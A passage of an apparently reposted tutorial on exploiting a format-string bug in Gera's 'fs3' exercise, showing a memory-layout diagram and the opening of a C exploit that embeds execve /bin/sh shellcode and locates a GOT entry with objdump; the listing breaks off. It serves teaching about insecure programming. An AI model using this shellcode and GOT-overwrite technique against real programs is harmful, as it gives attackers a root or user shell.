
Insecure Programming by Example: Format Strings (2)

2006-04-02 20:26:42 Source: WEB开发网


|                         |
|-------------------------| <----- 0xbffffad7
|        shellcode        |
|-------------------------|
|           NOP           |
|           NOP           |
|           NOP           | > 0xbfff95c0
|           NOP           |
|           NOP           |
|-------------------------|
|   deregister address    |
|-------------------------| <----- 0xbfff3ad7
|                         |


Demonstration exploit:
/*
** exp_fs3.c
** Coded by Core Security - info@core-sec.com
*/

#include <string.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <unistd.h>

#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs3"
#define GREP "/bin/grep"

/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void) {
    char evil_buffer[49149 + 1], temp_buffer[64];
    char *p;
    unsigned int deregister_address;   /* read with %x, so unsigned */
    FILE *f;

    /* Find the GOT entry for "deregister" in the victim's relocation table. */
    snprintf(temp_buffer, sizeof(temp_buffer), "%s -R %s | %s deregister",
             OBJDUMP, VICTIM, GREP);
    f = popen(temp_buffer, "r");
    if (f == NULL) {
        perror("popen");
        exit(1);
    }
    /* The first field of the matching objdump line is the entry's address. */
    if (fscanf(f, "%x", &deregister_address) != 1) {
        pclose(f);
        printf("Error: Cannot find deregister address in GOT!\n");
        exit(1);
    }

    printf("deregister address is: 0x%x\n", deregister_address);

    /* The listing breaks off here; the rest of main() is not on this page. */
